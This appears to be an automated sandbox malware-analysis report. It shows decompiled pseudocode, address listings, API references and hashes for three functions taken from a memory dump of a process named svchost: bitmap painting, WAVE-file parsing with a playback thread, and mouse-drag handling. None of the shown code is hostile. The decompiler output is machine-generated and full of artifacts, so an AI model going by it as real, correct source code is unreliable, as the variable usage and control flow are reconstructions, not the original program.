				_push(E004901B8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t141;
				_t135 = __ecx;
				_t97 = _a4;
				GetClientRect( *(__ecx + 0x1c),  &(_v32.top));
				_t66 =  *(_t135 + 0xcc);
				if(_t66 != 0) {
					L14:
					if( *(_t135 + 0xc0) == 0) {
						L26:
						 *[fs:0x0] = _v12;
						return _t66;
					}
					if(_t66 != 0 ||  *(_t135 + 0xc4) == 0) {
						L18:
						 *(_t135 + 0xc4) = 1;
						if( *(_t135 + 0xb8) == 0) {
							_push( *((intOrPtr*)(_t135 + 0xdc)));
							_t82 = E00489F7B( &_v36);
							if(_t82 != 0) {
								_t82 =  *(_t82 + 4);
							}
							FillRect(_a4,  &_v32, _t82);
							_v52 = 0x497844;
							_t40 =  &_v52; // 0x497844
							_v32.bottom = 2;
							E00489F15(_t40);
							_v32.bottom = 0xffffffff;
						}
						_t133 = CreateCompatibleDC(_t97);
						_v56 = SelectObject(_t133,  *(_t135 + 0xc0));
						E0043A530(_t135, _t149,  &_v68,  &_v8,  &_v60,  &_v64);
						if( *((intOrPtr*)(_t135 + 0xd0)) == 0) {
							BitBlt(_t97, _v68, _v8,  *(_t135 + 0xd4),  *(_t135 + 0xd8), _t133, 0, 0, 0xcc0020);
						} else {
							SetStretchBltMode(_t97, E004204B0());
							StretchBlt(_t97, _v76, _v16, _v68, _v72, _t133, 0, 0,  *(_t135 + 0xd4),  *(_t135 + 0xd8), 0xcc0020);
						}
						SelectObject(_t133, _v92);
						 *(_t135 + 0xc4) = 0;
						_t66 = DeleteDC(_t133);
						goto L26;
					} else {
						do {
						} while ( *(_t135 + 0xc4) != 0);
						goto L18;
					}
				}
				_t112 =  *(_t135 + 0xc8);
				if(_t112 != 0) {
					goto L14;
				}
				if( *((intOrPtr*)(_t135 + 0xe0)) != 1) {
					if(_t112 != 0 ||  *((intOrPtr*)(_t135 + 0xe0)) != 0) {
						goto L14;
					} else {
						_t66 =  *(_t135 + 0xb8);
						if(_t66 == 0) {
							_push( *((intOrPtr*)(_t135 + 0xdc)));
							_t88 = E00489F7B( &_v44);
							if(_t88 != 0) {
								_t88 =  *(_t88 + 4);
							}
							FillRect(_a4,  &_v32, _t88);
							_v60 = 0x497844;
							_t27 =  &_v60; // 0x497844
							_v32.bottom = 1;
							_t66 = E00489F15(_t27);
						}
						goto L26;
					}
				}
				 *(_t135 + 0xc8) = 1;
				if( *(_t135 + 0xb8) == 0) {
					_push( *((intOrPtr*)(_t135 + 0xdc)));
					_t92 = E00489F7B( &_v44);
					if(_t92 != 0) {
						_t92 =  *(_t92 + 4);
					}
					FillRect(_a4,  &_v32, _t92);
					_v60 = 0x497844;
					_t16 =  &_v60; // 0x497844
					_v32.bottom = 0;
					E00489F15(_t16);
					_v32.bottom = 0xffffffff;
				}
				_t66 = E0043A940();
				goto L26;
			}




























    0x0043a6c0
    0x0043a6c6
    0x0043a6c8
    0x0043a6cd
    0x0043a6ce
    0x0043a6e3
    0x0043a6e6
    0x0043a6ee
    0x0043a6f4
    0x0043a701
    0x0043a7de
    0x0043a7e6
    0x0043a922
    0x0043a92a
    0x0043a934
    0x0043a934
    0x0043a7ee
    0x0043a804
    0x0043a804
    0x0043a812
    0x0043a81e
    0x0043a81f
    0x0043a826
    0x0043a828
    0x0043a828
    0x0043a835
    0x0043a83b
    0x0043a843
    0x0043a847
    0x0043a84f
    0x0043a854
    0x0043a854
    0x0043a86f
    0x0043a875
    0x0043a88f
    0x0043a89c
    0x0043a903
    0x0043a89e
    0x0043a8a5
    0x0043a8d8
    0x0043a8d8
    0x0043a90f
    0x0043a911
    0x0043a91c
    0x00000000
    0x0043a7fa
    0x0043a7fa
    0x0043a800
    0x00000000
    0x0043a7fa
    0x0043a7ee
    0x0043a707
    0x0043a70f
    0x00000000
    0x00000000
    0x0043a71b
    0x0043a783
    0x00000000
    0x0043a78f
    0x0043a78f
    0x0043a797
    0x0043a7a7
    0x0043a7a8
    0x0043a7af
    0x0043a7b1
    0x0043a7b1
    0x0043a7be
    0x0043a7c4
    0x0043a7cc
    0x0043a7d0
    0x0043a7d4
    0x0043a7d4
    0x00000000
    0x0043a797
    0x0043a783
    0x0043a723
    0x0043a72b
    0x0043a737
    0x0043a738
    0x0043a73f
    0x0043a741
    0x0043a741
    0x0043a74e
    0x0043a754
    0x0043a75c
    0x0043a760
    0x0043a768
    0x0043a76d
    0x0043a76d
    0x0043a777
    0x00000000

    APIs
    • GetClientRect.USER32(?,?), ref: 0043A6EE
    • FillRect.USER32(?,?,00000000), ref: 0043A74E
    • FillRect.USER32(?,?,00000000), ref: 0043A7BE
      • Part of subcall function 00489F7B: __EH_prolog.LIBCMT ref: 00489F80
      • Part of subcall function 00489F7B: CreateSolidBrush.GDI32(?), ref: 00489F9D
    • FillRect.USER32(?,?,00000000), ref: 0043A835
    • CreateCompatibleDC.GDI32(?), ref: 0043A85D
    • SelectObject.GDI32(00000000,?), ref: 0043A873
    • SetStretchBltMode.GDI32(?,00000000), ref: 0043A8A5
    • StretchBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0043A8D8
    • BitBlt.GDI32(?,00000000,?,?,?,00000000,00000000,00000000,00CC0020), ref: 0043A903
    • SelectObject.GDI32(00000000,?), ref: 0043A90F
    • DeleteDC.GDI32(00000000), ref: 0043A91C
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Fill$CreateObjectSelectStretch$BrushClientCompatibleDeleteH_prologModeSolid
    • String ID: DxI$DxI
    • API String ID: 1645634290-798960703
    • Opcode ID: f1c46862a07a8a99f9201247ebc5460f25575b12ce4272548969a4160a9a099a
    • Instruction ID: f5511c6e2250695efe54a65c3da7ed310d6e4cfe9f78b2f17b0a4dc4b4492e22
    • Opcode Fuzzy Hash: f1c46862a07a8a99f9201247ebc5460f25575b12ce4272548969a4160a9a099a
    • Instruction Fuzzy Hash: F8613E75244701AFD724DF65C984F6BB3F8AF98704F00591EF69A93280DB78E805CB66
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0043CCF0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 331threadCOMMON
    Download Yara Rule
    C-Code - Quality: 85%
    			E0043CCF0(signed int __ecx, void* _a4, void** _a8, void* _a12) {
				intOrPtr _v0;
				char _v4;
				signed int _v8;
				signed int _v16;
				void* _t67;
				void* _t70;
				void* _t71;
				void* _t72;
				void** _t75;
				void* _t77;
				void* _t91;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t97;
				void* _t98;
				intOrPtr _t106;
				intOrPtr* _t108;
				signed int _t110;
				signed int _t111;
				intOrPtr _t112;
				void* _t114;
				intOrPtr _t116;
				void* _t122;
				intOrPtr _t123;
				void* _t124;
				signed int _t136;
				signed int _t137;
				intOrPtr* _t152;
				intOrPtr _t160;
				signed int _t161;
				intOrPtr _t162;
				intOrPtr _t179;
				intOrPtr _t189;
				intOrPtr _t191;
				signed int _t195;
				void* _t196;
				intOrPtr _t202;
				intOrPtr _t203;
				void* _t204;
				void* _t206;
				intOrPtr* _t207;
				signed int _t208;
				intOrPtr _t209;
				signed int* _t211;
				signed int* _t212;
				signed int* _t213;
				signed int* _t217;
				signed int* _t218;
				signed int* _t219;

				if(_a8 < 0x24) {
					L15:
					return 0;
				} else {
					_t204 = _a4;
					asm("repne scasb");
					_t128 =  !(__ecx | 0xffffffff) - 1;
					_t67 = E00470280(_t204, "RIFF",  !(__ecx | 0xffffffff) - 1);
					_t211 =  &(( &_v8)[3]);
					if(_t67 != 0) {
						goto L15;
					} else {
						_v4 =  *((intOrPtr*)(_t204 + 4));
						asm("repne scasb");
						_t70 = E00470280(_t204 + 8, "WAVE",  !(_t128 | 0xffffffff) - 1);
						_t212 =  &(_t211[3]);
						if(_t70 != 0) {
							goto L15;
						} else {
							_t122 = 0;
							_t206 = 0;
							_t208 = 0;
							_t195 = _a4 + 0xc;
							_v8 = _t195;
							do {
								_a4 =  *((intOrPtr*)(_t195 + 4));
								_t71 = E00470280(_t195, "fmt ", 4);
								_t212 =  &(_t212[3]);
								if(_t71 != 0) {
									_t72 = E00470280(_t195, "data", 4);
									_t212 =  &(_t212[3]);
									if(_t72 != 0) {
										goto L9;
									} else {
										_t208 = _a4;
										_t206 = _t195 + 8;
										if(_t122 != 0) {
											L11:
											if(_t206 == 0 || _t208 <= 0) {
												goto L15;
											} else {
												_t75 = E00483003(0x4c);
												_a8 = _t75;
												 *(_t75 + 8) = _t208;
												_t77 = E00471697(_a8[2]);
												_t213 =  &(_t212[2]);
												 *_a8 = _t77;
												_t78 = _a8;
												_t196 =  *_a8;
												if(_t196 != 0) {
													_t136 = _t208;
													_t137 = _t136 >> 2;
													memcpy(_t196, _t206, _t137 << 2);
													memcpy(_t206 + _t137 + _t137, _t206, _t136 & 0x00000003);
													_a8[0x12] = _a12;
													_a8[7] = 0;
													_a8[3] = E0043CAE0(0x3c00, 0x14);
													_a8[0xb] = CreateEventA(0, 1, 0, 0);
													_a8[0xa] = CreateSemaphoreA(0, 0x14, 0x14, 0);
													_a8[5] = 0;
													_a8[4] = 0x14;
													 *0x492298( &(_a8[0xc]));
													E0043CB50(_a4 + 4, _t122, _a4, E0043D320);
													_t217 =  &(_t213[0xc]);
													_t91 = CreateThread(0, 0, E0043D0D0, _a4, 4, _a4 + 0x24);
													 *(_v0 + 0x20) = _t91;
													 *0x49224c(0x4c9e70);
													_t93 =  *0x4c9e90; // 0x0
													_t179 =  *0x4c9e94; // 0x0
													_t207 = _t93;
													if(_t179 - _t93 >> 2 >= 1) {
														if(_t93 - _t207 >> 2 >= 1) {
															E0043D390(_t93 + 0xfffffffc, _t93, _t93);
															_t96 =  *0x4c9e90; // 0x0
															_t152 = _t96;
															_t97 = _t96 + 0xfffffffc;
															if(_t207 != _t97) {
																do {
																	_t97 = _t97 - 4;
																	_t152 = _t152 - 4;
																	 *_t152 =  *_t97;
																} while (_t97 != _t207);
															}
															_t58 = _t207 + 4; // 0x4
															_t98 = _t58;
															while(_t207 != _t98) {
																 *_t207 = _v4;
																_t207 = _t207 + 4;
															}
														} else {
															_t55 = _t207 + 4; // 0x4
															E0043D390(_t207, _t93, _t55);
															_t106 =  *0x4c9e90; // 0x0
															E0043D3C0(_t106, 1 - (_t106 - _t207 >> 2),  &_v16);
															_t160 =  *0x4c9e90; // 0x0
															_t108 = _t207;
															if(_t207 != _t160) {
																do {
																	 *_t108 = _v4;
																	_t108 = _t108 + 4;
																} while (_t108 != _t160);
															}
														}
														 *0x4c9e90 =  *0x4c9e90 + 4;
													} else {
														_t189 =  *0x4c9e8c; // 0x0
														if(_t189 == 0 || _t93 - _t189 >> 2 <= 1) {
															_t161 = 1;
														} else {
															_t161 = _t93 - _t189 >> 2;
														}
														if(_t189 != 0) {
															_t110 = _t93 - _t189 >> 2;
														} else {
															_t110 = 0;
														}
														_t111 = _t110 + _t161;
														_v8 = _t111;
														if(_t111 < 0) {
															_t111 = 0;
														}
														_t112 = E00483003(_t111 * 4);
														_t202 =  *0x4c9e8c; // 0x0
														_t218 =  &(_t217[1]);
														_t209 = _t112;
														_t123 = _t209;
														while(_t202 != _t207) {
															E0043D3F0(_t123, _t202);
															_t202 = _t202 + 4;
															_t218 =  &(_t218[2]);
															_t123 = _t123 + 4;
														}
														_t114 = E0043D3F0(_t123,  &_v4);
														_t203 =  *0x4c9e90; // 0x0
														_t219 =  &(_t218[2]);
														_t124 = _t123 + 4;
														while(_t207 != _t203) {
															_t114 = E0043D3F0(_t124, _t207);
															_t207 = _t207 + 4;
															_t219 =  &(_t219[2]);
															_t124 = _t124 + 4;
														}
														_t162 =  *0x4c9e90; // 0x0
														_t191 =  *0x4c9e8c; // 0x0
														E0043D380(_t114, _t191, _t162);
														_t116 =  *0x4c9e8c; // 0x0
														E0048302C(_t116);
														 *0x4c9e94 = _t209 + _v16 * 4;
														_t53 = E0043D360(0x4c9e88) * 4; // 0x4
														 *0x4c9e8c = _t209;
														 *0x4c9e90 = _t209 + _t53 + 4;
													}
													 *0x492250(0x4c9e70);
													ResumeThread( *(_v8 + 0x20));
													ReleaseSemaphore( *(_v8 + 0x28), 0x14, 0);
													return 1;
												} else {
													E0048302C(_t78);
													goto L15;
												}
											}
										} else {
											goto L9;
										}
									}
								} else {
									_t122 = _t195 + 8;
									if(_t206 != 0) {
										break;
									} else {
										goto L9;
									}
								}
								goto L41;
								L9:
								_t195 = _t195 + _a4 + 8;
							} while (_t195 - _v8 < _v4);
							if(_t122 == 0) {
								goto L15;
							} else {
								goto L11;
							}
						}
					}
				}
				L41:
			}




















































    0x0043ccfe
    0x0043ce10
    0x0043ce16
    0x0043cd04
    0x0043cd0e
    0x0043cd12
    0x0043cd16
    0x0043cd1e
    0x0043cd23
    0x0043cd28
    0x00000000
    0x0043cd2e
    0x0043cd36
    0x0043cd42
    0x0043cd4e
    0x0043cd53
    0x0043cd58
    0x00000000
    0x0043cd5e
    0x0043cd62
    0x0043cd64
    0x0043cd66
    0x0043cd68
    0x0043cd6b
    0x0043cd6f
    0x0043cd7a
    0x0043cd7e
    0x0043cd83
    0x0043cd88
    0x0043cd9b
    0x0043cda0
    0x0043cda5
    0x00000000
    0x0043cda7
    0x0043cda7
    0x0043cdab
    0x0043cdb0
    0x0043cdce
    0x0043cdd0
    0x00000000
    0x0043cdd6
    0x0043cdd8
    0x0043cddd
    0x0043cde1
    0x0043cdec
    0x0043cdf5
    0x0043cdf8
    0x0043cdfa
    0x0043cdfe
    0x0043ce02
    0x0043ce17
    0x0043ce22
    0x0043ce25
    0x0043ce2c
    0x0043ce36
    0x0043ce3d
    0x0043ce58
    0x0043ce6d
    0x0043ce7a
    0x0043ce81
    0x0043ce8c
    0x0043ce9b
    0x0043ceb0
    0x0043ceb9
    0x0043ced0
    0x0043cedf
    0x0043cee2
    0x0043cee8
    0x0043ceed
    0x0043cef5
    0x0043cefd
    0x0043cffd
    0x0043d058
    0x0043d05d
    0x0043d062
    0x0043d064
    0x0043d069
    0x0043d06b
    0x0043d06b
    0x0043d06d
    0x0043d073
    0x0043d073
    0x0043d06b
    0x0043d077
    0x0043d077
    0x0043d07c
    0x0043d082
    0x0043d084
    0x0043d086
    0x0043cfff
    0x0043cfff
    0x0043d00a
    0x0043d019
    0x0043d02e
    0x0043d033
    0x0043d039
    0x0043d03d
    0x0043d03f
    0x0043d043
    0x0043d045
    0x0043d047
    0x0043d04b
    0x0043d03d
    0x0043d08a
    0x0043cf03
    0x0043cf03
    0x0043cf0b
    0x0043cf22
    0x0043cf19
    0x0043cf1d
    0x0043cf1d
    0x0043cf29
    0x0043cf31
    0x0043cf2b
    0x0043cf2b
    0x0043cf2b
    0x0043cf34
    0x0043cf38
    0x0043cf3c
    0x0043cf3e
    0x0043cf3e
    0x0043cf48
    0x0043cf4d
    0x0043cf53
    0x0043cf56
    0x0043cf5a
    0x0043cf5c
    0x0043cf60
    0x0043cf65
    0x0043cf68
    0x0043cf6b
    0x0043cf6e
    0x0043cf78
    0x0043cf7d
    0x0043cf83
    0x0043cf86
    0x0043cf8b
    0x0043cf8f
    0x0043cf94
    0x0043cf97
    0x0043cf9a
    0x0043cf9d
    0x0043cfa1
    0x0043cfa7
    0x0043cfb4
    0x0043cfb9
    0x0043cfbf
    0x0043cfd4
    0x0043cfdf
    0x0043cfe3
    0x0043cfe9
    0x0043cfe9
    0x0043d095
    0x0043d0a3
    0x0043d0b5
    0x0043d0c7
    0x0043ce04
    0x0043ce05
    0x00000000
    0x0043ce0a
    0x0043ce02
    0x00000000
    0x00000000
    0x00000000
    0x0043cdb0
    0x0043cd8a
    0x0043cd8c
    0x0043cd8f
    0x00000000
    0x0043cd91
    0x00000000
    0x0043cd91
    0x0043cd8f
    0x00000000
    0x0043cdb2
    0x0043cdba
    0x0043cdc6
    0x0043cdcc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0043cdcc
    0x0043cd58
    0x0043cd28
    0x00000000

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0043CE5B
    • CreateSemaphoreA.KERNEL32(00000000,00000014,00000014,00000000), ref: 0043CE70
    • RtlInitializeCriticalSection.NTDLL(?), ref: 0043CE9B
    • CreateThread.KERNEL32(00000000,00000000,0043D0D0,?,00000004,?), ref: 0043CED0
    • RtlEnterCriticalSection.NTDLL(004C9E70), ref: 0043CEE2
    • RtlLeaveCriticalSection.NTDLL(004C9E70), ref: 0043D095
    • ResumeThread.KERNEL32(?), ref: 0043D0A3
    • ReleaseSemaphore.KERNEL32(?,00000014,00000000), ref: 0043D0B5
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CreateCriticalSection$SemaphoreThread$EnterEventInitializeLeaveReleaseResume
    • String ID: RIFF$WAVE$data$fmt
    • API String ID: 1802393137-4212202414
    • Opcode ID: 65fb761d8f6907855dcab970824bd963702d5118980fd65427f618626713fa15
    • Instruction ID: d1a9704af2a1d390afc1684d89d132c3744fb1c7e52f83c10cba873e9d92e0a5
    • Opcode Fuzzy Hash: 65fb761d8f6907855dcab970824bd963702d5118980fd65427f618626713fa15
    • Instruction Fuzzy Hash: 5AB10375A00300ABD714DF28DC85F6B77A5FB98708F144A2EF94AA7380D679ED01CB99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00432660 Relevance: 19.8, APIs: 13, Instructions: 320windowCOMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E00432660(intOrPtr* __ecx) {
				signed int _v8;
				RECT* _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				struct tagMSG _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void* _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				void* __ebp;
				struct HWND__* _t87;
				intOrPtr _t103;
				void* _t115;
				int _t119;
				void* _t131;
				void* _t134;
				void* _t142;
				void* _t145;
				char _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr* _t213;
				struct tagPOINT* _t228;
				intOrPtr* _t230;
				void* _t232;
				intOrPtr _t234;
				signed int _t235;
				signed int _t236;
				intOrPtr _t237;
				void* _t238;

				_push(0xffffffff);
				_push(E0048FAE8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t237;
				_t238 = _t237 - 0x4c;
				_push(_t232);
				_t230 = __ecx;
				_t87 = GetCapture();
				_t240 = _t87;
				if(_t87 != 0) {
					L21:
					 *[fs:0x0] = _v12;
					return _t87;
				}
				_v88 = E0042D860(_t230);
				E00484C84(_t232, SetCapture( *(_t230 + 0x1c)));
				_push(_t230);
				E00489C16( &_v64, _t240);
				_push( *((intOrPtr*)(_t230 + 0x5c)));
				_push( *((intOrPtr*)(_t230 + 0x58)));
				_v12 = 0;
				E00445E70( &_v68);
				_t238 = _t238 + 0xc;
				_t213 = E00432AE0(_t230, _t232,  &_v92);
				_v88 =  *_t213;
				_v84 =  *((intOrPtr*)(_t213 + 4));
				E00489B44( &_v72,  &_v88);
				E004896D5( &_v76, 1);
				E0048964A( &_v80, 7);
				E004895EE( &_v84, 1);
				_push(0xffffff);
				_push(0);
				_push(2);
				E00489F2B( &_v96);
				_v60.time = 1;
				_t103 = E00489512( &_v100,  &_v108);
				_t234 = _v32;
				_t158 = _v36;
				_t228 = _v60.pt;
				_push(_t234);
				_v128 = _t103;
				E00432A60( &_v104,  &_v104, _t228,  &_v120, _t158);
				if(E00484C84(_t234, GetCapture()) != _t230) {
					L19:
					_push(_t234);
					E00432A60(_t107,  &_v80, _t228,  &_v96, _t158);
					ReleaseCapture();
					E00489512( &_v100, _v124);
					_v112 = 0x496df0;
					_v60.lParam = 4;
					L20:
					E00489F15( &_v92);
					_v28 = 0xffffffff;
					_t87 = E00489C88( &_v84, _t246);
					goto L21;
				}
				while(GetMessageA( &_v60, 0, 0, 0) != 0) {
					_t107 = _v60.message;
					if(_t107 != 0x100) {
						__eflags = _t107 - 0x204;
						if(_t107 == 0x204) {
							goto L19;
						}
						L7:
						if(_v60.hwnd ==  *(_t230 + 0x1c)) {
							_t115 = _t107 - 0x200;
							__eflags = _t115;
							if(_t115 == 0) {
								L12:
								_push(_t234);
								E00432A60( &_v80,  &_v80, _t228,  &_v96, _t158);
								__eflags = _t158 - 0xffffffff;
								if(_t158 == 0xffffffff) {
									__eflags = _t234 - 0xffffffff;
									if(_t234 != 0xffffffff) {
										 *(_t228 + 4) = 0;
										 *_t228 = _v60.time;
									}
								} else {
									 *_t228 = 0;
									 *(_t228 + 4) = _v60.pt;
								}
								_t119 = ScreenToClient( *(_t230 + 0x1c), _t228);
								__eflags = _v60.hwnd - 0x202;
								if(_v60.hwnd == 0x202) {
									ReleaseCapture();
									E00489512( &_v84, _v108);
									_push( *((intOrPtr*)(_t230 + 0x5c)));
									_push( *((intOrPtr*)(_t230 + 0x58)));
									E00445E70( &_v88);
									_t238 = _t238 + 0xc;
									E0042D280( &_v16,  &_v88);
									_v36 = 2;
									DPtoLP(_v84, _t228, 1);
									__eflags = _t158 - 0xffffffff;
									if(_t158 == 0xffffffff) {
										__eflags = _t234 - 0xffffffff;
										if(_t234 != 0xffffffff) {
											_t159 = _v8;
											__eflags = _t159 -  *_t228;
											if(_t159 !=  *_t228) {
												_v12 = E0042D390(_t230, _t234, _t234);
												_t160 =  ~_t159;
												_push(_t160);
												_push(E0042D550(_t230, _t234,  *_t228));
												_t131 = E0042D550(_t230, _t234, _v20);
												__eflags = _t131 - 0x14;
												if(_t131 >= 0x14) {
													_push(_t160);
													_push(E0042D550(_t230, _t234,  *_t228));
													_t134 = E0042D550(_t230, _t234, _v24);
												} else {
													_t134 = 0x14;
												}
												__eflags = _t134 - _v24;
												if(__eflags != 0) {
													E0042AE90(_v128, __eflags, _t234, 1, _t134);
													InvalidateRect( *(_t230 + 0x1c), 0, 0);
													 *((intOrPtr*)( *_t230 + 0xc8))(_t234);
												}
											}
										}
									} else {
										_t235 = _v8;
										__eflags = _t235 -  *(_t228 + 4);
										if(_t235 !=  *(_t228 + 4)) {
											_v12 = E0042D2B0(_t230, _t235, _t158);
											_t236 =  ~_t235;
											_push(_t236);
											_push(E0042D680(_t230, _t236,  *(_t228 + 4)));
											_t142 = E0042D680(_t230, _t236, _v20);
											__eflags = _t142 - 0x14;
											if(_t142 >= 0x14) {
												_push(_t236);
												_push(E0042D680(_t230, _t236,  *(_t228 + 4)));
												_t145 = E0042D680(_t230, _t236, _v24);
											} else {
												_t145 = 0x14;
											}
											__eflags = _t145 - _v24;
											if(__eflags != 0) {
												E0042AE40(_v128, __eflags, _t158, 1, _t145);
												InvalidateRect( *(_t230 + 0x1c), 0, 0);
												 *((intOrPtr*)( *_t230 + 0xc4))(_t158);
											}
										}
									}
									E0042D2A0( &_v12);
									_v92 = 0x496df0;
									_v28 = 3;
									goto L20;
								}
								_push(_t234);
								E00432A60(_t119,  &_v84, _t228,  &_v100, _t158);
								goto L18;
							}
							__eflags = _t115 == 2;
							if(_t115 == 2) {
								goto L12;
							} else {
								DispatchMessageA( &_v60);
								goto L18;
							}
						} else {
							DispatchMessageA( &_v60);
							L18:
							_t107 = E00484C84(_t234, GetCapture());
							_t246 = _t107 - _t230;
							if(_t107 == _t230) {
								continue;
							}
							goto L19;
						}
					}
					if(_v60.wParam == 0x1b) {
						goto L19;
					} else {
						goto L7;
					}
				}
				_t107 = E0048DABD(_v60.wParam);
				goto L19;
			}

















































    0x00432666
    0x00432668
    0x0043266d
    0x0043266e
    0x00432675
    0x00432679
    0x0043267c
    0x0043267e
    0x00432684
    0x00432686
    0x004328af
    0x004328b7
    0x004328c1
    0x004328c1
    0x00432693
    0x004326a2
    0x004326a7
    0x004326ac
    0x004326b7
    0x004326bc
    0x004326be
    0x004326c6
    0x004326cb
    0x004326da
    0x004326e1
    0x004326e9
    0x004326f2
    0x004326fd
    0x00432708
    0x00432713
    0x00432718
    0x0043271d
    0x0043271f
    0x00432725
    0x0043272e
    0x00432738
    0x0043273d
    0x00432741
    0x00432745
    0x00432749
    0x0043274e
    0x0043275c
    0x0043276f
    0x00432860
    0x00432860
    0x0043286f
    0x00432874
    0x00432883
    0x00432888
    0x00432890
    0x00432895
    0x00432899
    0x004328a2
    0x004328aa
    0x00000000
    0x004328aa
    0x00432775
    0x0043278e
    0x00432797
    0x004327a6
    0x004327ab
    0x00000000
    0x00000000
    0x004327b1
    0x004327ba
    0x004327cc
    0x004327cc
    0x004327d1
    0x004327e5
    0x004327e5
    0x004327f4
    0x004327f9
    0x004327fc
    0x0043280d
    0x00432810
    0x00432816
    0x0043281d
    0x0043281d
    0x004327fe
    0x00432802
    0x00432808
    0x00432808
    0x00432824
    0x0043282a
    0x00432832
    0x004328d0
    0x004328df
    0x004328ea
    0x004328ef
    0x004328f1
    0x004328f6
    0x00432902
    0x0043290f
    0x00432914
    0x0043291a
    0x0043291d
    0x004329b3
    0x004329b6
    0x004329bc
    0x004329c2
    0x004329c4
    0x004329d0
    0x004329d4
    0x004329d6
    0x004329e3
    0x004329e7
    0x004329ec
    0x004329ef
    0x004329fa
    0x00432a07
    0x00432a0b
    0x004329f1
    0x004329f1
    0x004329f1
    0x00432a10
    0x00432a14
    0x00432a1e
    0x00432a2b
    0x00432a36
    0x00432a36
    0x00432a14
    0x004329c4
    0x00432923
    0x00432923
    0x0043292a
    0x0043292c
    0x0043293d
    0x00432941
    0x00432943
    0x00432950
    0x00432954
    0x00432959
    0x0043295c
    0x00432968
    0x00432975
    0x00432979
    0x0043295e
    0x0043295e
    0x0043295e
    0x0043297e
    0x00432982
    0x00432990
    0x0043299d
    0x004329a8
    0x004329a8
    0x00432982
    0x0043292c
    0x00432a40
    0x00432a45
    0x00432a4d
    0x00000000
    0x00432a4d
    0x00432838
    0x00432847
    0x00000000
    0x00432847
    0x004327d3
    0x004327d6
    0x00000000
    0x004327d8
    0x004327dd
    0x00000000
    0x004327dd
    0x004327bc
    0x004327c1
    0x0043284c
    0x00432853
    0x00432858
    0x0043285a
    0x00000000
    0x00000000
    0x00000000
    0x0043285a
    0x004327ba
    0x0043279e
    0x00000000
    0x004327a4
    0x00000000
    0x004327a4
    0x0043279e
    0x004328c9
    0x00000000

    APIs
    • GetCapture.USER32 ref: 0043267E
    • SetCapture.USER32(?,?,?,?,?,?,?,?,?,0048FAE8,000000FF,00431EBD,?,?,?,?), ref: 0043269B
      • Part of subcall function 00489C16: __EH_prolog.LIBCMT ref: 00489C1B
      • Part of subcall function 00489C16: GetDC.USER32(?), ref: 00489C44
      • Part of subcall function 00445E70: GetWindowExtEx.GDI32(?,?), ref: 00445E93
      • Part of subcall function 00489B44: GetWindowExtEx.GDI32(?,?), ref: 00489B55
      • Part of subcall function 00489B44: GetViewportExtEx.GDI32(?,?), ref: 00489B62
      • Part of subcall function 00489B44: MulDiv.KERNEL32(?,00000000,00000000), ref: 00489B87
